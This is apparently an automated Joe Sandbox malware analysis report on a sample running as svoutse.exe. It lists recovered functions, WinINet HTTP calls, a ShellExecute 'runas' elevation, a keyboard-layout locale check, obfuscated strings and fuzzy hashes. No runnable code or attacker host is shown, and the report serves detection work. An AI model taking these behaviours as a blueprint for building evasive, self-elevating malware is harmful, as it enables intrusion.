Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 05950BAC Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1289927394.0000000005950000.00000040.00001000.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_pud8g3zixE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03cf521d15d7f27fe7cf6343db7d9ff0f7aa2dbaefc569cbf440d16b8f658779
Instruction ID: 3f32b429c6e7b22e30dbb00333bd3ae5baa54c7ac175302b417a8f44ba63e252
Opcode Fuzzy Hash: 03cf521d15d7f27fe7cf6343db7d9ff0f7aa2dbaefc569cbf440d16b8f658779
Instruction Fuzzy Hash: 67F020B614C216BF5A43C944DA49AFA3F9FB783330B30082AFC0787102A2C185B13320

Function 05950C4D Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1289927394.0000000005950000.00000040.00001000.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_pud8g3zixE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7836d385c8a6d0f57cb231e77109f567a0671995849fd3141bfd98e0171181c7
Instruction ID: 2d86b8ae01f963dc1e8bd36a189f06d775f91f8ca15c9d2119c4ac259f5a7db3
Opcode Fuzzy Hash: 7836d385c8a6d0f57cb231e77109f567a0671995849fd3141bfd98e0171181c7
Instruction Fuzzy Hash: E8119E96158111AFC602E5A5D59D6E63FEFBB57330B301C2AE887CB101E28581A67781

Analysis Process: svoutse.exePID: 7616, Parent PID: 932COMMON

Execution Graph

Execution Coverage:	10.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.6%
Total number of Nodes:	1881
Total number of Limit Nodes:	54

Executed Functions

Function 008ABCA0 Relevance: 19.9, APIs: 5, Strings: 6, Instructions: 671
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(008F8D68,00000000,00000000,00000000,00000000), ref: 008ABD2D
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 008ABD51
HttpOpenRequestA.WININET(?,00000000), ref: 008ABD9B
HttpSendRequestA.WININET(?,00000000), ref: 008ABE5B
InternetReadFile.WININET(?,?,000003FF,?), ref: 008ABF0D
InternetCloseHandle.WININET(?), ref: 008ABFE7
InternetCloseHandle.WININET(?), ref: 008ABFEF
InternetCloseHandle.WININET(?), ref: 008ABFF7

Strings

Ox6JWx==, xrefs: 008ABD73
stoi argument out of range, xrefs: 008AE34A
5AOQdAlvGA==, xrefs: 008AC22B, 008AC483
invalid stoi argument, xrefs: 008AE354
OfSj, xrefs: 008AD456
5AOQdEJ6GCc=, xrefs: 008AC2C5

Memory Dump Source

Source File: 0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000F.00000002.3705432910.00000000008A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3705869185.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707087021.0000000000909000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.000000000090B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000B81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BB9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3712461292.0000000000BC8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714584721.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714884942.0000000000D72000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8a0000_svoutse.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
String ID: 5AOQdAlvGA==$5AOQdEJ6GCc=$OfSj$Ox6JWx==$invalid stoi argument$stoi argument out of range
API String ID: 688256393-4188736742
Opcode ID: 1cb138f284727bc3618931399cb7066132f58944677e546668de59e8a01de1e2
Instruction ID: 5cbc8f0c2bb0977d8daec5c57672ada14791b936d19133cce310473857c3207d
Opcode Fuzzy Hash: 1cb138f284727bc3618931399cb7066132f58944677e546668de59e8a01de1e2
Instruction Fuzzy Hash: 1332E071A002089FEB18CF28CC85BEDBBB5FF46314F548158E419E76C2E7759A84CB95

Function 008A71C0 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 576
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteA.SHELL32(00000000,008A73DD,?,?,00000000,00000000), ref: 008A7255
Sleep.KERNELBASE(00000064,69C2811F,?,00000000,008E8EE8,000000FF), ref: 008A74DC
CreateThread.KERNELBASE(00000000,00000000,008A7340,00908608,00000000,00000000,?,?,?,?,?,?,?,?), ref: 008A75CF
Sleep.KERNELBASE(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008A75D9

Part of subcall function 008BCF27: RtlWakeAllConditionVariable.NTDLL ref: 008BCFDB

Strings

runas, xrefs: 008A7213

Memory Dump Source

Source File: 0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000F.00000002.3705432910.00000000008A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3705869185.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707087021.0000000000909000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.000000000090B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000B81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BB9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3712461292.0000000000BC8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714584721.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714884942.0000000000D72000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8a0000_svoutse.jbxd

Yara matches

Similarity

API ID: Sleep$ConditionCreateExecuteShellThreadVariableWake
String ID: runas
API String ID: 2515422543-4000483414
Opcode ID: 0bb288ed1a27fc3784a2f8521d494ba945a18d4619a4bdfe059e27a3feca5cb4
Instruction ID: 7b453dbe1369d96b3f3881dd59fd20eb9e51d33cdd29e646066d2d62559b11e6
Opcode Fuzzy Hash: 0bb288ed1a27fc3784a2f8521d494ba945a18d4619a4bdfe059e27a3feca5cb4
Instruction Fuzzy Hash: 27125571614208AFEB08DF28CD85BEE7BA5FB46310F508618F815D77C1DB39A984CB96

Function 008A64F0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 008A6590

Strings

FLSieN==, xrefs: 008A66E1
DLYieN==, xrefs: 008A6638
OrXbcERt, xrefs: 008A65AC

Memory Dump Source

Source File: 0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000F.00000002.3705432910.00000000008A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3705869185.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707087021.0000000000909000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.000000000090B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000B81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BB9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3712461292.0000000000BC8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714584721.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714884942.0000000000D72000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8a0000_svoutse.jbxd

Yara matches

Similarity

API ID: AccountLookupName
String ID: DLYieN==$FLSieN==$OrXbcERt
API String ID: 1484870144-540991378
Opcode ID: 4aa1e26a8df1af5228b572660a05935891e0174285e7137fd2f7cecfc690c432
Instruction ID: 54984e425abfeb7a624dac196599d30ca0569b99ef831ca939e4f8e40e88e851
Opcode Fuzzy Hash: 4aa1e26a8df1af5228b572660a05935891e0174285e7137fd2f7cecfc690c432
Instruction Fuzzy Hash: 5A91E2B1A0011C9FEB28DB28CC85BEDB778FB45304F4445E9E118D3686EA349BC48FA5

Function 008BD243 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 008A247E

Memory Dump Source

Source File: 0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000F.00000002.3705432910.00000000008A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3705869185.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707087021.0000000000909000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.000000000090B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000B81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BB9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3712461292.0000000000BC8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714584721.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714884942.0000000000D72000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8a0000_svoutse.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 097c096a6c0b5366092c99206ace10d05e2d1e4968887fdbe64214f42856b7f7
Instruction ID: 0c9ca122fb17c0f8ad8e3bf1d32d6ca1a5019c9fb8b148545044e18b56ca3c09
Opcode Fuzzy Hash: 097c096a6c0b5366092c99206ace10d05e2d1e4968887fdbe64214f42856b7f7
Instruction Fuzzy Hash: BF518A72A1470AAFDB19CF58D8957AEBBF5FB48314F24852AD804EB390E3B49940DF50

Function 008B41F0 Relevance: 42.8, APIs: 1, Strings: 22, Instructions: 2584sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 008B7860: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 008B794C
Part of subcall function 008B7860: __Cnd_destroy_in_situ.LIBCPMT ref: 008B7958
Part of subcall function 008B7860: __Mtx_destroy_in_situ.LIBCPMT ref: 008B7961

Part of subcall function 008ABCA0: InternetOpenW.WININET(008F8D68,00000000,00000000,00000000,00000000), ref: 008ABD2D
Part of subcall function 008ABCA0: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 008ABD51
Part of subcall function 008ABCA0: HttpOpenRequestA.WININET(?,00000000), ref: 008ABD9B

std::_Xinvalid_argument.LIBCPMT ref: 008B4DF2
Sleep.KERNELBASE ref: 008B6B55

Strings

Cp==, xrefs: 008B4C7D
8P1W, xrefs: 008B53BC
8gJW, xrefs: 008B54CB
SQVW, xrefs: 008B536A
246122658369, xrefs: 008B4E8A, 008B4E9D, 008B4EDF, 008B4EE9, 008B54E4
6AVW, xrefs: 008B5341
7cX=, xrefs: 008B6373
TzXW, xrefs: 008B5393
5PNW, xrefs: 008B54F2
invalid stoi argument, xrefs: 008B4DED
7zJW, xrefs: 008B53E5
c7817d, xrefs: 008B5479
6V W, xrefs: 008B530D
JzJ+, xrefs: 008B46C6, 008B473D, 008B49E5, 008B4A5C
6WJW, xrefs: 008B5460
7WNZdt==, xrefs: 008B4662
SQFW, xrefs: 008B540E
JzN+, xrefs: 008B470D, 008B483C, 008B4A2C, 008B4B5B
Hv1QNN==, xrefs: 008B54A9
stoi argument out of range, xrefs: 008B4DFC
7VNW, xrefs: 008B5487
SfhW, xrefs: 008B5437

Memory Dump Source

Source File: 0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000F.00000002.3705432910.00000000008A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3705869185.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707087021.0000000000909000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.000000000090B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000B81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BB9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3712461292.0000000000BC8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714584721.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714884942.0000000000D72000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8a0000_svoutse.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestSleepXinvalid_argumentstd::_
String ID: 246122658369$5PNW$6AVW$6V W$6WJW$7VNW$7WNZdt==$7cX=$7zJW$8P1W$8gJW$Cp==$Hv1QNN==$JzJ+$JzN+$SQFW$SQVW$SfhW$TzXW$c7817d$invalid stoi argument$stoi argument out of range
API String ID: 4201286991-404453217
Opcode ID: a28e045ba4d9bdb06fd0213c3a15488c5f9e1986e82d3cf4675acc75460d1c7e
Instruction ID: 6e7bc839d2e1537d87b536024ae11e7d49194e502071b78f8c5ad38e19c9c82e
Opcode Fuzzy Hash: a28e045ba4d9bdb06fd0213c3a15488c5f9e1986e82d3cf4675acc75460d1c7e
Instruction Fuzzy Hash: 70230371A002589BEB19DB28CD897DDBB76FB81314F548198E008E73D2EB359B85CF52

Function 008B4610 Relevance: 35.5, APIs: 1, Strings: 21, Instructions: 2516COMMON

Download Yara Rule

APIs

Part of subcall function 008B7860: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 008B794C
Part of subcall function 008B7860: __Cnd_destroy_in_situ.LIBCPMT ref: 008B7958
Part of subcall function 008B7860: __Mtx_destroy_in_situ.LIBCPMT ref: 008B7961

Part of subcall function 008ABCA0: InternetOpenW.WININET(008F8D68,00000000,00000000,00000000,00000000), ref: 008ABD2D
Part of subcall function 008ABCA0: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 008ABD51
Part of subcall function 008ABCA0: HttpOpenRequestA.WININET(?,00000000), ref: 008ABD9B

std::_Xinvalid_argument.LIBCPMT ref: 008B4DF2

Strings

Cp==, xrefs: 008B4C7D
8P1W, xrefs: 008B53BC
8gJW, xrefs: 008B54CB
SQVW, xrefs: 008B536A
246122658369, xrefs: 008B4E8A, 008B4E9D, 008B4EDF, 008B4EE9, 008B54E4
6AVW, xrefs: 008B5341
7cX=, xrefs: 008B6373, 008B6642
TzXW, xrefs: 008B5393
5PNW, xrefs: 008B54F2
7zJW, xrefs: 008B53E5
c7817d, xrefs: 008B5479
6V W, xrefs: 008B530D
JzJ+, xrefs: 008B46C6, 008B473D, 008B49E5, 008B4A5C
6WJW, xrefs: 008B5460
7WNZdt==, xrefs: 008B4662
SQFW, xrefs: 008B540E
JzN+, xrefs: 008B470D, 008B483C, 008B4A2C, 008B4B5B
Hv1QNN==, xrefs: 008B54A9
stoi argument out of range, xrefs: 008B4DFC
7VNW, xrefs: 008B5487
SfhW, xrefs: 008B5437

Memory Dump Source

Source File: 0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000F.00000002.3705432910.00000000008A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3705869185.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707087021.0000000000909000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.000000000090B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000B81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BB9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3712461292.0000000000BC8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714584721.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714884942.0000000000D72000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8a0000_svoutse.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
String ID: 246122658369$5PNW$6AVW$6V W$6WJW$7VNW$7WNZdt==$7cX=$7zJW$8P1W$8gJW$Cp==$Hv1QNN==$JzJ+$JzN+$SQFW$SQVW$SfhW$TzXW$c7817d$stoi argument out of range
API String ID: 2414744145-405670124
Opcode ID: 466e12a2cecaa839011080ff707cec0b1bbd9e619a127d096d54ee709e055e75
Instruction ID: 763676ec1245d5fe5a6d50f2dd502568d2669bdebc373241c677722586b15c8b
Opcode Fuzzy Hash: 466e12a2cecaa839011080ff707cec0b1bbd9e619a127d096d54ee709e055e75
Instruction Fuzzy Hash: 5F23E271A002589BEB19DB28CD897DDBB76EB81314F5481D8E008E73D2EB359F858F52

Function 008A5C60 Relevance: 17.9, APIs: 5, Strings: 5, Instructions: 449
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 008A5CDC
RegCloseKey.KERNELBASE(?,?,?,00000000,00000001,?), ref: 008A5D16

Strings

0000043f, xrefs: 008A603B
00000422, xrefs: 008A5FD9
Keyboard Layout\Preload, xrefs: 008A5F64
00000419, xrefs: 008A5FA8
00000423, xrefs: 008A600A

Memory Dump Source

Source File: 0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000F.00000002.3705432910.00000000008A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3705869185.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707087021.0000000000909000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.000000000090B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000B81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BB9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3712461292.0000000000BC8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714584721.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714884942.0000000000D72000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8a0000_svoutse.jbxd

Yara matches

Similarity

API ID: CloseOpen
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 47109696-3963862150
Opcode ID: 06eac58483bce48e41e5838c47ca598ada4c3b3a095d46dc334ffa3caaae6e2e
Instruction ID: 362db87094473b8a586e5f96fac5c9fc9c6882e0eee7371fd0977aec9ece4b65
Opcode Fuzzy Hash: 06eac58483bce48e41e5838c47ca598ada4c3b3a095d46dc334ffa3caaae6e2e
Instruction Fuzzy Hash: 09F1B171900218ABEB24DF24CC85BEEB779FF45304F544298F508E7681EB74AAE48F95

Function 008A7C40 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 008A7DE3

Strings

GcxoNd==, xrefs: 008A804A
GcxnPN==, xrefs: 008A7FA2
GcxnOd==, xrefs: 008A80F2

Memory Dump Source

Source File: 0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000F.00000002.3705432910.00000000008A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3705869185.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707087021.0000000000909000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.000000000090B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000B81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BB9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3712461292.0000000000BC8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714584721.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714884942.0000000000D72000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8a0000_svoutse.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: GcxnOd==$GcxnPN==$GcxoNd==
API String ID: 1721193555-2621399922
Opcode ID: a1ad9903df8be1396facca866595ada480025c4253f93c371ef39c5eb8d65c89
Instruction ID: cf924c6ada70090cd6ab904898e395f38b5e5240356532fd81e525c97b05ae28
Opcode Fuzzy Hash: a1ad9903df8be1396facca866595ada480025c4253f93c371ef39c5eb8d65c89
Instruction Fuzzy Hash: C6D1C570E04208ABEB14BB2CCD4A79D7A61FB82324F944298E415E77C2EB354E8197D3

Function 008D6D31 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 008D6D53
GetFileInformationByHandle.KERNELBASE(?,?), ref: 008D6DAD
__dosmaperr.LIBCMT ref: 008D6E42

Part of subcall function 008D70A7: __dosmaperr.LIBCMT ref: 008D70DC

Memory Dump Source

Source File: 0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000F.00000002.3705432910.00000000008A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3705869185.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707087021.0000000000909000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.000000000090B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000B81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BB9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3712461292.0000000000BC8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714584721.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714884942.0000000000D72000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8a0000_svoutse.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: c171506bc4ba04f7b9c1afaaeb0393279daa68959f5c6d09323a83599d36ac52
Instruction ID: 3cdde87cde4958ce96ad8adf34e920e639b428431773ea7d780decb2a67462e6
Opcode Fuzzy Hash: c171506bc4ba04f7b9c1afaaeb0393279daa68959f5c6d09323a83599d36ac52
Instruction Fuzzy Hash: 03413C75900648AEDB249FA9D8419AFB7F9FF89304B20462EE856D3710EB30A9109B61

Function 008D6BC9 Relevance: 3.1, APIs: 2, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000F.00000002.3705432910.00000000008A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3705869185.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707087021.0000000000909000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.000000000090B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000B81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BB9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3712461292.0000000000BC8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714584721.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714884942.0000000000D72000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8a0000_svoutse.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6611f432e7c901ceecee19f80e4fd503576bd3150746c6201b8f2b5d39431e0
